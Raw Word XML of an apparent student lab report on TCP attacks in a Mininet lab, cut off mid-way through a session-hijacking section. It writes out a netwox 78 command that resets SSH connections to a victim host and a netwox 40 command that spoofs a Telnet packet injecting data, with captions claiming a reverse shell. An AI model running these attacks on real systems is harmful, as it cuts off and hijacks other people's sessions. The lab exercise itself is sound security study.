          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8B57A7" w14:textId="31E61B2C" w:rsidR="00F75D06" w:rsidRDefault="00F75D06" w:rsidP="00F75D06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>leg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> terminal, establish a</w:t>
      </w:r>
      <w:r w:rsidR="00864047">
        <w:t xml:space="preserve">n SSH </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">connection to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>vic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AE980F" w14:textId="4A6AE6C9" w:rsidR="00F75D06" w:rsidRDefault="00864047" w:rsidP="00F75D06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F75D06" w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E6A2A">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>mininet@10.0.0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74913085" w14:textId="77777777" w:rsidR="00012484" w:rsidRDefault="00864047" w:rsidP="00012484">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58088BB5" wp14:editId="5AE48A6D">
            <wp:extent cx="3867150" cy="1247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5FBD" w14:textId="6A211BDF" w:rsidR="00864047" w:rsidRPr="00864047" w:rsidRDefault="00012484" w:rsidP="00012484">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD2612">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> SSH connection in </w:t>
      </w:r>
      <w:r w:rsidR="00E249E2">
        <w:t>leg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3E58CE" w14:textId="250FA1E3" w:rsidR="00864047" w:rsidRDefault="00864047" w:rsidP="00864047">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>att</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">terminal, run an RST attack on port 22 of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>vic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE1A702" w14:textId="40DCBDD9" w:rsidR="00864047" w:rsidRDefault="00864047" w:rsidP="00864047">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> 78 --device “att-eth0” --filter “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> host 10.0.0.3 and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> port 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167D19D3" w14:textId="77777777" w:rsidR="00012484" w:rsidRDefault="00864047" w:rsidP="00012484">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09BDA6DF" wp14:editId="4BB76CDA">
            <wp:extent cx="4581525" cy="257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16F4" w14:textId="0E185918" w:rsidR="00864047" w:rsidRPr="00864047" w:rsidRDefault="00012484" w:rsidP="00012484">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD2612">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 78 attack in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>att</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0676DC97" w14:textId="31D4841B" w:rsidR="00864047" w:rsidRDefault="00864047" w:rsidP="00864047">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The SSH connection in </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8287D">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>leg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is terminated (tested by running a command) and future connections cannot be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43179B46" w14:textId="77777777" w:rsidR="00AB54E1" w:rsidRDefault="00864047" w:rsidP="00AB54E1">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="266952FD" wp14:editId="31A16F1B">
            <wp:extent cx="3552825" cy="904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CF42" w14:textId="3DD4AB12" w:rsidR="007D5F0C" w:rsidRPr="003A5E8A" w:rsidRDefault="00AB54E1" w:rsidP="003A5E8A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD2612">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> SSH connection in leg terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B2F5FA" w14:textId="77777777" w:rsidR="0000668B" w:rsidRDefault="0000668B" w:rsidP="00556B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E41D118" w14:textId="07BAC6F2" w:rsidR="0010533B" w:rsidRDefault="00556B58" w:rsidP="0000668B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Telnet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31148C06" w14:textId="77777777" w:rsidR="00B67A1B" w:rsidRDefault="00E83299" w:rsidP="00B67A1B">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54282216" wp14:editId="2B02D1BB">
            <wp:extent cx="5943600" cy="2210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2CB8" w14:textId="0265DA0C" w:rsidR="00556B58" w:rsidRDefault="00B67A1B" w:rsidP="00B67A1B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD2612">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> RST attack on Telnet connection packets in Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239ADA7F" w14:textId="175B0813" w:rsidR="007C72A9" w:rsidRDefault="007C72A9" w:rsidP="0000668B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EDFFB3" w14:textId="77777777" w:rsidR="00B67A1B" w:rsidRDefault="00E83299" w:rsidP="00B67A1B">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16851B57" wp14:editId="26E1E0CE">
            <wp:extent cx="5943600" cy="12338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AAB5" w14:textId="32F02BA9" w:rsidR="00E83299" w:rsidRDefault="00026F66" w:rsidP="00026F66">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="center" w:pos="4680"/>
          <w:tab w:val="left" w:pos="7860"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B67A1B">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD2612">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="00B67A1B">
        <w:t xml:space="preserve"> RST attack on SSH connection packets in Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E9E589" w14:textId="1460CB81" w:rsidR="00026F66" w:rsidRDefault="00026F66" w:rsidP="00026F66">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TCP RST Attacks on SSH and TELNET Connections</w:t>
      </w:r>
      <w:r w:rsidRPr="00026F66">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C17A437" w14:textId="66350C6F" w:rsidR="00026F66" w:rsidRPr="00026F66" w:rsidRDefault="00DE6AFA" w:rsidP="00026F66">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>I observe that the attack is successful by observing the</w:t>
      </w:r>
      <w:r w:rsidR="00591D8E">
        <w:t xml:space="preserve"> spoofed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RST packet</w:t>
      </w:r>
      <w:r w:rsidR="00A80D14">
        <w:t xml:space="preserve">s transmitted from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A80D14" w:rsidRPr="00E12855">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>vic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A80D14">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00A80D14" w:rsidRPr="00E12855">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>leg</w:t>
      </w:r>
      <w:r w:rsidR="00A80D14">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00591D8E">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r w:rsidR="00591D8E" w:rsidRPr="00E12855">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>att</w:t>
      </w:r>
      <w:r w:rsidR="00591D8E">
        <w:t>. To terminate the telnet connection, packets are directed to port 23 and for SSH connections, packets are directed to port 22.</w:t>
      </w:r>
      <w:r w:rsidR="00A80D14">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD1FA2">
        <w:t xml:space="preserve">By entering a command in the SSH and telnet connection in </w:t>
      </w:r>
      <w:r w:rsidR="00BD1FA2" w:rsidRPr="00E12855">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>leg</w:t>
      </w:r>
      <w:r w:rsidR="00BD1FA2">
        <w:t xml:space="preserve">, the `Connection reset by peer` and `Connection terminated by foreign host` message is displayed in the respective terminals and the connection is </w:t>
      </w:r>
      <w:r w:rsidR="00D07229">
        <w:t>ended</w:t>
      </w:r>
      <w:r w:rsidR="00BD1FA2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41729C7B" w14:textId="77777777" w:rsidR="00026F66" w:rsidRPr="00026F66" w:rsidRDefault="00026F66" w:rsidP="00026F66"/>
    <w:p w14:paraId="55F00309" w14:textId="1D0AF321" w:rsidR="00DA4C2D" w:rsidRPr="00074A07" w:rsidRDefault="00B00F33" w:rsidP="00B67A1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> 40 --ip4-offsetfrag 0 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 10.0.0.2 --ip4-dst 10.0.0.3 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>tcp-src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> 45</w:t>
      </w:r>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>534</w:t>
      </w:r>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>tcp-dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> 23 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>tcp-seqnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>3624306446 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>tcp-acknum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> 88133758</w:t>
      </w:r>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>-ack --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>tcp-psh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>-window 57 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00074A07">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>-data "7077640d00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E596EB" w14:textId="77777777" w:rsidR="00DF5722" w:rsidRDefault="00B00F33" w:rsidP="00DF5722">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A1C8BD3" wp14:editId="542CE19D">
            <wp:extent cx="4648200" cy="3324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D244" w14:textId="3DC64FC7" w:rsidR="00B00F33" w:rsidRDefault="00DF5722" w:rsidP="00DF5722">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD2612">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 40 command with reverse terminal payload data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D2EF1C" w14:textId="07B38402" w:rsidR="00DA4C2D" w:rsidRDefault="00DA4C2D" w:rsidP="00DA4C2D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15015794" w14:textId="77777777" w:rsidR="00527F0E" w:rsidRDefault="00E72837" w:rsidP="00527F0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413958" wp14:editId="1C41CC13">
            <wp:extent cx="5448300" cy="5600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37A8" w14:textId="1CD65422" w:rsidR="00172AB8" w:rsidRDefault="00527F0E" w:rsidP="00527F0E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD2612">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> Wireshark trace after telnet connection from leg to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C522E9">
        <w:t xml:space="preserve"> terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0921FB" w14:textId="77777777" w:rsidR="00527F0E" w:rsidRDefault="00E72837" w:rsidP="00527F0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242D7B" wp14:editId="67F1B54D">
            <wp:extent cx="5715000" cy="6438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1322" w14:textId="1C16541C" w:rsidR="00E72837" w:rsidRDefault="00527F0E" w:rsidP="00527F0E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD2612">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> Wireshark trace after successfully creating a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30769C07" w14:textId="283FE0BA" w:rsidR="006A62B3" w:rsidRDefault="006A62B3" w:rsidP="006A62B3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>TCP Session Hijacking</w:t>
      </w:r>
      <w:r w:rsidRPr="00026F66">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514C78AE" w14:textId="6D63C187" w:rsidR="006A62B3" w:rsidRDefault="006A62B3" w:rsidP="006A62B3">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The hijack was carried out by following these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF7BFB9" w14:textId="2140BBDE" w:rsidR="006A62B3" w:rsidRDefault="006A62B3" w:rsidP="006A62B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Open the telnet port 23 in vic. (Figure 17)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27044870" w14:textId="31214915" w:rsidR="006A62B3" w:rsidRDefault="006A62B3" w:rsidP="006A62B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Create a telnet connection from leg to vic. (Figure 18)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FD6A04" w14:textId="1384A974" w:rsidR="006715D8" w:rsidRDefault="006715D8" w:rsidP="006A62B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
